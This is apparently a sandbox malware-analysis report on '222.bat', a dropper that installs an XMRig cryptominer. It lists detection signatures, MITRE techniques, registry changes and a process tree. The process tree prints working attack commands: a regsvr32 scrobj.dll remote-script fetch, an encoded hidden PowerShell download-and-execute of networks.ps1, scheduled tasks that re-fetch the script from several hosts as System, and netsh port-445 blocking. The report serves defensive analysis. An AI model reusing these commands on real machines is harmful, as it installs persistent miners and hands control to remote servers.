xmrig | 30899cd09dd5df4bfe5242ef5ff17f353ce1fd07a8c762702c1eb4e2ba8bfba1

Resubmissions

16-10-2021 08:50

211016-krydjscfbj 10

16-10-2021 06:51

211016-hmx6wabgb9 10

Analysis

max time kernel
136s
max time network
136s
platform
windows10_x64
resource
win10-de-20211014
submitted
16-10-2021 06:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

222.bat
Size

89B
MD5

75a4daa4b7e656ded55a6a7865342d04
SHA1

8e52d1f4dfa6bd9501ba89855b44059bf92f699e
SHA256

30899cd09dd5df4bfe5242ef5ff17f353ce1fd07a8c762702c1eb4e2ba8bfba1
SHA512

16fafec07a8ebed3d602c6af50323a2c8e0f784f4d8ccd172d78d935cb7e8a2294a51c02999a04e53efdaf290a5de687cb7654d67f38590eee392431bd7c2334

Score

10^/10

xmrig evasion miner persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://cat.xiaoshabi.nl/networks.ps1

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\Network\Connections\services.exe	xmrig
C:\ProgramData\Microsoft\Network\services.exe	xmrig
C:\ProgramData\Microsoft\Network\services.exe	xmrig
C:\ProgramData\Microsoft\Network\Connections\services.exe	xmrig

Blocklisted process makes network request 12 IoCs

Processes:

powershell.exe

flow	pid	process
10	1008	powershell.exe
39	1008	powershell.exe
43	1008	powershell.exe
45	1008	powershell.exe
48	1008	powershell.exe
50	1008	powershell.exe
51	1008	powershell.exe
52	1008	powershell.exe
53	1008	powershell.exe
54	1008	powershell.exe
55	1008	powershell.exe
56	1008	powershell.exe

Executes dropped EXE 11 IoCs

Processes:

mon.exemin.exeuas.exeSetACL.exeSetACL.exeSetACL.execohernece.exeservices.exeservices.exeservices.exeservices.exe

pid	process
2036	mon.exe
2224	min.exe
2876	uas.exe
3604	SetACL.exe
2140	SetACL.exe
2224	SetACL.exe
648	cohernece.exe
2876	services.exe
1360	services.exe
3908	services.exe
2968	services.exe

Modifies AppInit DLL entries 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\ProgramData\Microsoft\Windows\SetACL.exe	upx
C:\Users\Admin\AppData\Local\Temp\cohernece.exe	upx
C:\Users\Admin\AppData\Local\Temp\cohernece.exe	upx

Loads dropped DLL 7 IoCs

Processes:

svchost.exeservices.exeservices.exeservices.exeservices.exe

pid process

2636 svchost.exe
2876 services.exe
1360 services.exe
812
3908 services.exe
420
2968 services.exe
Drops file in System32 directory 1 IoCs

Processes:

cohernece.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\FastUserSwitchingCompatibilityex.dll cohernece.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2208 schtasks.exe
1796 schtasks.exe
2344 schtasks.exe
2664 schtasks.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXENETSTAT.EXE

pid process

3256 NETSTAT.EXE
2036 NETSTAT.EXE
Modifies data under HKEY_USERS 1 IoCs

Processes:

services.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache services.exe

pid	process
2636	svchost.exe
2876	services.exe
1360	services.exe
812
3908	services.exe
420
2968	services.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\FastUserSwitchingCompatibilityex.dll	cohernece.exe

pid	process
2208	schtasks.exe
1796	schtasks.exe
2344	schtasks.exe
2664	schtasks.exe

pid	process
3256	NETSTAT.EXE
2036	NETSTAT.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	services.exe

Modifies registry class 44 IoCs

Processes:

FileSyncConfig.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INSTANCE\INITPROPERTYBAG	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe,0"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INPROCSERVER32	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe,0"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\Attributes = "4034920525"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ = "OneDrive"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SHELLFOLDER	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\CLSID = "{0E5AAE11-A475-4c5b-AB00-C66DE400274E}"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\CLSID = "{0E5AAE11-A475-4c5b-AB00-C66DE400274E}"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\Attributes = "17"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32\ = "%systemroot%\\SysWow64\\shell32.dll"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32\ = "%systemroot%\\system32\\shell32.dll"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\Attributes = "4034920525"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INSTANCE\INITPROPERTYBAG	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SHELLFOLDER	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ = "OneDrive"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SortOrderIndex = "66"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\Attributes = "17"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\TargetKnownFolder = "{a52bba46-e9e1-435f-b3d9-28daa648c0f6}"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SortOrderIndex = "66"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\FolderValueFlags = "40"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "1"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "1"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\FolderValueFlags = "40"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\TargetKnownFolder = "{a52bba46-e9e1-435f-b3d9-28daa648c0f6}"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INPROCSERVER32	FileSyncConfig.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1828 reg.exe

pid	process
1828	reg.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exeservices.exeservices.exeservices.exeservices.exe

pid	process
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
2876	services.exe
2876	services.exe
2876	services.exe
2876	services.exe
2876	services.exe
2876	services.exe
1360	services.exe
1360	services.exe
1360	services.exe
1360	services.exe
3908	services.exe
3908	services.exe
3908	services.exe
3908	services.exe
3908	services.exe
3908	services.exe
2968	services.exe
2968	services.exe
3908	services.exe
3908	services.exe
3908	services.exe
3908	services.exe
3908	services.exe
3908	services.exe
3908	services.exe
3908	services.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exeNETSTAT.EXE

description	pid	process
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeIncreaseQuotaPrivilege	1008	powershell.exe
Token: SeSecurityPrivilege	1008	powershell.exe
Token: SeTakeOwnershipPrivilege	1008	powershell.exe
Token: SeLoadDriverPrivilege	1008	powershell.exe
Token: SeSystemProfilePrivilege	1008	powershell.exe
Token: SeSystemtimePrivilege	1008	powershell.exe
Token: SeProfSingleProcessPrivilege	1008	powershell.exe
Token: SeIncBasePriorityPrivilege	1008	powershell.exe
Token: SeCreatePagefilePrivilege	1008	powershell.exe
Token: SeBackupPrivilege	1008	powershell.exe
Token: SeRestorePrivilege	1008	powershell.exe
Token: SeShutdownPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeSystemEnvironmentPrivilege	1008	powershell.exe
Token: SeRemoteShutdownPrivilege	1008	powershell.exe
Token: SeUndockPrivilege	1008	powershell.exe
Token: SeManageVolumePrivilege	1008	powershell.exe
Token: 33	1008	powershell.exe
Token: 34	1008	powershell.exe
Token: 35	1008	powershell.exe
Token: 36	1008	powershell.exe
Token: SeIncreaseQuotaPrivilege	1008	powershell.exe
Token: SeSecurityPrivilege	1008	powershell.exe
Token: SeTakeOwnershipPrivilege	1008	powershell.exe
Token: SeLoadDriverPrivilege	1008	powershell.exe
Token: SeSystemProfilePrivilege	1008	powershell.exe
Token: SeSystemtimePrivilege	1008	powershell.exe
Token: SeProfSingleProcessPrivilege	1008	powershell.exe
Token: SeIncBasePriorityPrivilege	1008	powershell.exe
Token: SeCreatePagefilePrivilege	1008	powershell.exe
Token: SeBackupPrivilege	1008	powershell.exe
Token: SeRestorePrivilege	1008	powershell.exe
Token: SeShutdownPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeSystemEnvironmentPrivilege	1008	powershell.exe
Token: SeRemoteShutdownPrivilege	1008	powershell.exe
Token: SeUndockPrivilege	1008	powershell.exe
Token: SeManageVolumePrivilege	1008	powershell.exe
Token: 33	1008	powershell.exe
Token: 34	1008	powershell.exe
Token: 35	1008	powershell.exe
Token: 36	1008	powershell.exe
Token: SeShutdownPrivilege	2636	powercfg.exe
Token: SeCreatePagefilePrivilege	2636	powercfg.exe
Token: SeShutdownPrivilege	1080	powercfg.exe
Token: SeCreatePagefilePrivilege	1080	powercfg.exe
Token: SeShutdownPrivilege	2880	powercfg.exe
Token: SeCreatePagefilePrivilege	2880	powercfg.exe
Token: SeDebugPrivilege	3256	NETSTAT.EXE
Token: SeIncreaseQuotaPrivilege	1008	powershell.exe
Token: SeSecurityPrivilege	1008	powershell.exe
Token: SeTakeOwnershipPrivilege	1008	powershell.exe
Token: SeLoadDriverPrivilege	1008	powershell.exe
Token: SeSystemProfilePrivilege	1008	powershell.exe
Token: SeSystemtimePrivilege	1008	powershell.exe
Token: SeProfSingleProcessPrivilege	1008	powershell.exe
Token: SeIncBasePriorityPrivilege	1008	powershell.exe
Token: SeCreatePagefilePrivilege	1008	powershell.exe
Token: SeBackupPrivilege	1008	powershell.exe
Token: SeRestorePrivilege	1008	powershell.exe
Token: SeShutdownPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeSystemEnvironmentPrivilege	1008	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeregsvr32.execmd.exepowershell.execsc.exe

description	pid	process	target process
PID 2672 wrote to memory of 1312	2672	cmd.exe	regsvr32.exe
PID 2672 wrote to memory of 1312	2672	cmd.exe	regsvr32.exe
PID 1312 wrote to memory of 1812	1312	regsvr32.exe	cmd.exe
PID 1312 wrote to memory of 1812	1312	regsvr32.exe	cmd.exe
PID 1812 wrote to memory of 1008	1812	cmd.exe	powershell.exe
PID 1812 wrote to memory of 1008	1812	cmd.exe	powershell.exe
PID 1008 wrote to memory of 3680	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 3680	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 3068	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 3068	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 3688	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 3688	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 4024	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 4024	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 1572	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 1572	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 2116	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 2116	1008	powershell.exe	netsh.exe
PID 1008 wrote to memory of 2664	1008	powershell.exe	schtasks.exe
PID 1008 wrote to memory of 2664	1008	powershell.exe	schtasks.exe
PID 1008 wrote to memory of 2208	1008	powershell.exe	schtasks.exe
PID 1008 wrote to memory of 2208	1008	powershell.exe	schtasks.exe
PID 1008 wrote to memory of 1796	1008	powershell.exe	schtasks.exe
PID 1008 wrote to memory of 1796	1008	powershell.exe	schtasks.exe
PID 1008 wrote to memory of 2636	1008	powershell.exe	powercfg.exe
PID 1008 wrote to memory of 2636	1008	powershell.exe	powercfg.exe
PID 1008 wrote to memory of 1080	1008	powershell.exe	powercfg.exe
PID 1008 wrote to memory of 1080	1008	powershell.exe	powercfg.exe
PID 1008 wrote to memory of 2880	1008	powershell.exe	powercfg.exe
PID 1008 wrote to memory of 2880	1008	powershell.exe	powercfg.exe
PID 1008 wrote to memory of 3256	1008	powershell.exe	NETSTAT.EXE
PID 1008 wrote to memory of 3256	1008	powershell.exe	NETSTAT.EXE
PID 1008 wrote to memory of 3740	1008	powershell.exe	csc.exe
PID 1008 wrote to memory of 3740	1008	powershell.exe	csc.exe
PID 3740 wrote to memory of 1012	3740	csc.exe	cvtres.exe
PID 3740 wrote to memory of 1012	3740	csc.exe	cvtres.exe
PID 1008 wrote to memory of 2036	1008	powershell.exe	NETSTAT.EXE
PID 1008 wrote to memory of 2036	1008	powershell.exe	NETSTAT.EXE
PID 1008 wrote to memory of 2632	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 2632	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 1080	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 1080	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 2280	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 2280	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 2260	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 2260	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 2548	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 2548	1008	powershell.exe	findstr.exe
PID 1008 wrote to memory of 2948	1008	powershell.exe	attrib.exe
PID 1008 wrote to memory of 2948	1008	powershell.exe	attrib.exe
PID 1008 wrote to memory of 3704	1008	powershell.exe	attrib.exe
PID 1008 wrote to memory of 3704	1008	powershell.exe	attrib.exe
PID 1008 wrote to memory of 2036	1008	powershell.exe	mon.exe
PID 1008 wrote to memory of 2036	1008	powershell.exe	mon.exe
PID 1008 wrote to memory of 2036	1008	powershell.exe	mon.exe
PID 1008 wrote to memory of 2256	1008	powershell.exe	attrib.exe
PID 1008 wrote to memory of 2256	1008	powershell.exe	attrib.exe
PID 1008 wrote to memory of 2224	1008	powershell.exe	min.exe
PID 1008 wrote to memory of 2224	1008	powershell.exe	min.exe
PID 1008 wrote to memory of 2224	1008	powershell.exe	min.exe
PID 1008 wrote to memory of 1624	1008	powershell.exe	attrib.exe
PID 1008 wrote to memory of 1624	1008	powershell.exe	attrib.exe
PID 1008 wrote to memory of 2964	1008	powershell.exe	attrib.exe
PID 1008 wrote to memory of 2964	1008	powershell.exe	attrib.exe

Views/modifies file attributes 1 TTPs 7 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2948 attrib.exe
3704 attrib.exe
2256 attrib.exe
1624 attrib.exe
2964 attrib.exe
3704 attrib.exe
1268 attrib.exe

pid	process
2948	attrib.exe
3704	attrib.exe
2256	attrib.exe
1624	attrib.exe
2964	attrib.exe
3704	attrib.exe
1268	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\222.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\system32\regsvr32.exe
C:\Windows\system32\regsvr32.EXE /u /s /i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll
2⤵
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAGEAdAAuAHgAaQBhAG8AcwBoAGEAYgBpAC4AbgBsAC8AbgBlAHQAdwBvAHIAawBzAC4AcABzADEAJwApACkA
3⤵
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAGEAdAAuAHgAaQBhAG8AcwBoAGEAYgBpAC4AbgBsAC8AbgBlAHQAdwBvAHIAawBzAC4AcABzADEAJwApACkA
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1008

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add policy name=netbc
5⤵
PID:3680

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add filterlist name=block
5⤵
PID:3068

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add filteraction name=block action=block
5⤵
PID:3688

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
5⤵
PID:4024

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
5⤵
PID:1572

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" ipsec static set policy name=netbc assign=y
5⤵
PID:2116

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\MUI\LMRemove /tr "regsvr32 /u /s /i:http://cat.dashabi.in/networks.xsl scrobj.dll" /sc onstart /ru System /F
5⤵
- Creates scheduled task(s)
PID:2664

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\Multimedia\SystemEventService /tr "regsvr32 /u /s /i:http://cat.xiaojiji.nl/networks.xsl scrobj.dll" /sc minute /mo 720 /ru System /F
5⤵
- Creates scheduled task(s)
PID:2208

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\PLA\System\OhYGnepKu /tr "regsvr32 /u /s /i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll" /sc minute /mo 420 /ru System /F
5⤵
- Creates scheduled task(s)
PID:1796

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" /CHANGE -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" /CHANGE -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -anop tcp
5⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3256

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d4sp5b5c\d4sp5b5c.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:3740

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FF1.tmp" "c:\Users\Admin\AppData\Local\Temp\d4sp5b5c\CSC55B12A18C17D4C508FCAA0AB49F169B5.TMP"
6⤵
PID:1012

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -anop tcp
5⤵
- Gathers network information
PID:2036

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight "c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe"
5⤵
PID:2632

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight c:\windows\explorer.exe
5⤵
PID:1080

